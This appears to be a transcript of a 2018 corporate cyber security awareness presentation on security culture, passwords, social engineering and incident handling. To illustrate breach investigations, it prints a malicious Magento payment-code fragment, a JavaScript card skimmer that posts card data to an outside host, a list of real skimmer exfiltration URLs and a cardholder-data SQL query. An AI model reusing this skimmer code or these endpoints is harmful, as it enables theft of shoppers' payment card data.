3. srm hiaf presentation v0.1[1] (read-only) · 3 data security in today’s environment hunting...
TRANSCRIPT
4/30/18
1
Cyber Security – 25th April 2018
Alan Batey PCIP/PGCert Digital Forensics/B.AForensic and IR ManagerSecurity Risk Management Ltd
AgendaTo provide an overview of cyber security and the effects on today’s businesses:
- What is cyber security?
- Creating a culture around cyber security
- Data security measures
- Tips and best practice
What is cyber security?
4/30/18
2
Cyber Security is the collection of;
ü Actionsü Policiesü Trainingü Guidelinesü Best Practices
ü Security Conceptsü Technologiesü Safeguardsü Toolsü Risk management
Cyber Security Culture in business
Cybersecurity awareness links to Information security awareness
If you raise the awareness of employees information security responsibilities then you will eventually change the culture within an organisation.
It is also about making information security considerations an integral part of an employee’s job habits and conduct embedding them in their day-to-day actions
4/30/18
3
Data Security in today’s environment
Hunting was necessary to survive.
Making sure the good hunting areas were kept secret from other
clans was essential.
This ensured a plentiful supply of good food to
maintain life.
Security is not a new concept..
Not long after the invention of coins, we needed security to stop or at least easily identify
counterfeit ones.
Julius Caesar used the Shift by 3 rule when sending messages to his army to keep them secret from his enemies.
In WW2 the enigma device was used by the Germans to keep their troop movements and battle plans secret from the
British.
Security is not a new concept..
4/30/18
4
Pause for thought..
In cyberspace, we have created an environment in which we, as humans, have yet to evolve the native
senses to survive.
“We have anti-virus software, so we’re secure”“We have a firewall, so we’re secure”“The most serious threats come from the outside”“I don’t worry about security as I back up my data daily”“Responsibility for security falls under the IT team”
Common Security fallacies..
The core rules haven’t changedThe environment continues to changeWe all have the tools to surviveWe just need to engage them We need to adjust processes and behaviors
Keep calm and remember..
4/30/18
5
3 basic principles..
Con fid en tia lity
CIn tegrity
I
Availab ility
A
ü Protecting information from unauthorised disclosure
ü Protecting information from unauthorised modification.
ü Ensuring information is available to authorised users when it’s needed.Yet a great deal of mystery and intrigue still
surrounds Information Security!
A security analogy..
Imagine driving with no traffic laws and the chaos and danger for drivers and
pedestrians!
Information security management and policies provide the same type of protection for systems and users that traffic laws provide for drivers and pedestrians; Safer for the individual, beneficial for everyone!
A car, for example..
Security is like the brakes on your car; their function is to slow you down..
However their purpose is to allow you to go fast!
4/30/18
6
The way it used to be..
One way in! One entrance to protect!
The way it is now..
Many ways in! Many entrances to protect!
So, what is a cyber security policy?
Information Security Policy sets out users day-to-day security responsibilities
It relates to all employees, contractors and consultants
It dictates how sensitive information must be looked after
It is your responsibility to protect business information and know how it affects you
4/30/18
7
How does it affect me?
The problem..
“It won’t affect me”“Too expensive”
Not recognising the cyber security vulnerability threatNot understanding the potential impact
Some stats..
80% of crime to businesses is now cyberAttacks are very methodical and preciseSME’s are the most targeted
Commonly preventable; things such as anti-virus updates, lack of internal policy, process and procedures
On average, for every £40,000 lost per breach, only £1000 is recovered
4/30/18
8
Infosecurity threats
MalwareHacking&Denialof
ServiceAttacks Spyware
PhishingIdentityTheft Misuse
Malware – basic steps of a breach
Discover an unpatched CMS application
Upload a web shell on the server, providing a backdoor and access
Escalates privileges to fully compromise the web server and payment application.
Modifies the payment application code to collect payment card information as it is processed and dumps it into a file.
Uses the web shell to extract the payment card dumps.
8 out of 10 breaches we investigate are based on the Magento CMS
Magento is the most popular CMS
4/30/18
9
* Return data for Centinel validation** @ return Varien_Object*/
public function getCentinelValidationData(){
$info = $this->getInfoInstance();$params = new Varien_Object();$params
->setPaymentMethodCode($this->getCode())->setCardType($info->getCcType())->setCardNumber($info->getCcNumber())->setCardExpMonth($info->getCcExpMonth())->setCardExpYear($info->getCcExpYear())->setAmount($this->_getAmount())->setCurrencyCode($this->_getCurrencyCode())->setOrderNumber($this->_getOrderId());
return $params;}
/*** Store when success** @ return bool*/
private function _storeInfos($file = '/var/www/vhosts/ecommercesite.com/httpdocs/media/catalog/product/1/7/1678.pu_1.jpg'){
EMAILED TO SOUTH KOREA
Name17678.puSize178KB
Name17678.pu_1Size236KB
Image hacking
Cut and paste
C.cardnumber,c.expiration,c.seqcode,c.cardHolder,s.address,s.city,s.stateCode,s.zip,s.digitalemailtextFROM dbo.creditCards C, dbo.orders SWHERE C.[idOrder] = S.[idOrder].
Card holder data from this location was then saved in four files on the desktop named 2014.txt, 2015.txt, csv1 and Desktop.zip
Copied out to two external websites pastie.org and defuse.ca
Emailed to [email protected]
4/30/18
10
Javascript – shoplift vulnerability
var cc = new RegExp(\"[09]{13,16}\");\r\nvar asd=\"0\";\r\n if(cc.test(snd)){\r\nasd=\"1\" ;\r\n}\r\nvar http = new XMLHttpRequest();\r\nhttp.open(\"POST\",\"https://antaras.xyz/jquery.php\",true);\r\nhttp.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\");\r\nhttp.send(\"data=\"+snd+\"&asd=\"+asd+\"&id_id=ecommercesite.co.uk\");\r\nconsole.clear();\r\n }\r\n snd=null;\r\n setTimeout(\'send()\', 150);\r\n}\r\n// ]]></script>','2014-11-11 05:04:41','2015-07-27 16:48:03',
Javascript – shoplift vulnerability
1860https://ownsafety.org/opp.php390http://ownsafety.org/opp.php309https://useagleslogistics.com/gates/jquery.php100https://redwiggler.org/wp-content/themes/jquerys.php70https://clickvisits.biz/xrc.php28https://gamula.eu/jquery.php23https://gamula.ru/order.php22https://news-daily.me/gt/20https://antaras.xyz/jquery.php17https://clicksale.xyz/xrc.php10https://ausfunken.com/service/css.php9http://www.dobell.com/var/extendware/system/licenses/encoder/mage_ajax.php5https://redwiggler.org/wp-content/themes/jquery.php1/js/index.php1/js/am/extensions/sitemap_api.php1https://infopromo.biz/lib/jquery.php1https://google-adwords-website.biz/gates/jquery.php
Email should be used for business purposes only with incidental limited personal use
Be careful of incoming emails from unknown persons, as they may contain viruses
Do not send anything inappropriate
Misuse of e-mail may also amount to racial/sexual harassment/bullying or victimisation. Even jokes and general office banter, which some people find amusing, may cause offence to others. Therefore, care should be taken when sending items such as chain letters, junk mail and jokes
The use of the Internet based e-mail is expressly forbidden
4/30/18
11
Passwords
You are responsible for keeping your company user account secure. Passwords must NEVER be disclosed to anyone. You must not log in as another user when logging into the computer systemDo not write your password downDo not share your password with othersChange your password if you think someone else knows it
What is a strong password?Think of a sentence that you can remember:
“British summers are the best”
Use the first few letters of each word to create a made up word:“brsumatb”
Add some complexity: “BrsUmatb” – add a Mix of CAPS & lower case.Substitute characters with numbers and symbols: “Br$Um4tb” – change ‘s’ to ‘$’ and change ‘a’ to ‘4’.
Over to you - Try to work out a ‘Strong Password’ for yourself. Practise this technique, you can also use it at home and for other things for which you need to remember an important password.Never use any dictionary words, acronyms, birthdays, sequential numbers, family names, football teams, dates, etc. – they are easily guessed!
Stealing passwords..
• socialengineeringe.g.phishing;coercion
• manualpasswordguessing,perhapsusingpersonalinformation‘cribs’suchasname,dateofbirth,orpetnames
• interceptingapasswordasitistransmittedoveranetwork
• ‘shouldersurfing’,observingsomeonetypingintheirpasswordattheirdesk
• installingakeylogger
• searchinganenterprise’sITinfrastructureforelectronicallystoredpasswordinformation
• brute-forceattacks;theautomatedguessingoflargenumbersofpasswordsuntilthecorrectoneisfound
• findingpasswordswhichhavebeenstoredinsecurely,suchashandwrittenorhiddenclosetodevice
• compromisingdatabasescontaininglargenumbersofuserpasswords,thencheckingforre-useofthese
4/30/18
12
What not to do..
Clear screen policy
Whenever you leave your desk, ALWAYS ‘lock’ your screen by pressing ‘Ctrl +Alt+ Delete’ and then select “Lock Workstation” and press ‘Enter’. You can also use “Windows Key” + “L” to lock your computer.
Upon your return you will be required to enter your password to unlock your machine. Only you will know this password.
If leaving your desk for any length of time, it may be more appropriate to consider logging out.
Social Engineering
“Amateurshacksystems,professionalshackpeople.”
4/30/18
13
Types of Social Engineering
Pretexting
The act of creating and using an invented scenario to persuade a targeted victim to release information or perform an action.
Types of Social Engineering
Phishing – Vishing – SMiShing
A technique of fraudulently obtaining private information.
Types of Social Engineering
A Favour For A Favour
Manipulating somebody to feel grateful and feel they owe the social engineer a favour.
4/30/18
14
Types of Social Engineering
Baiting
Just like a real world Trojan Horse that uses physical media and relies on the curiosity or greed of the victim.
Key takeaways
ü Be vigilant at all times
ü Don’t disclose your password
ü Make your passwords complex
ü Always lock your PC
ü Encrypt sensitive information
ü Keep a clear desk
ü Dispose of Company Information correctly
ü Delete suspicious emails
ü Do not download or install anything on your work’s PC
ü Be mindful of physical access/shoulder surfers
Key takeaways
ü Be vigilant at all times
ü Don’t disclose your password
ü Make your passwords complex
ü Always lock your PC
ü Encrypt sensitive information
ü Keep a clear desk
ü Dispose of Company Information correctly
ü Delete suspicious emails
ü Do not download or install anything on your work’s PC
ü Be mindful of physical access/shoulder surfers
4/30/18
15
What if we still have a breach?
Incident Management
Ensure you have detailed definitionsReact according to a plan regardless of whether the breach is the result of:
• An external intruder attack, or• Unintentional damage, or• A disgruntled employee
Each of the possible types of events, such as those listed above, should be detailed in advance by adequate contingency plans.
Incident Management
If there is limited attention given to how to handle an incident or a hasty decision-making process, the following may result:
Difficulty in:• tracking down the incident source• collecting evidence• preparing for the recovery of the system, and • protecting the valuable data contained on the system
4/30/18
16
We all have a choice..
The cyber environment is now a core part of our reality. It may be invisible and intangible – but it is active and contested.
We have two choices – to participate as an active player – or to be exploited as a resource.
Summary
We can’t prevent every attack, but we can reduce the likelihood – and make sure that we can survive when it happens.
There are 2 types of company or organisation:Those who have been breachedThose who are about to be breached
Information security is a serious business.
NE14ToRcOFF33?T1m3f0R1unch!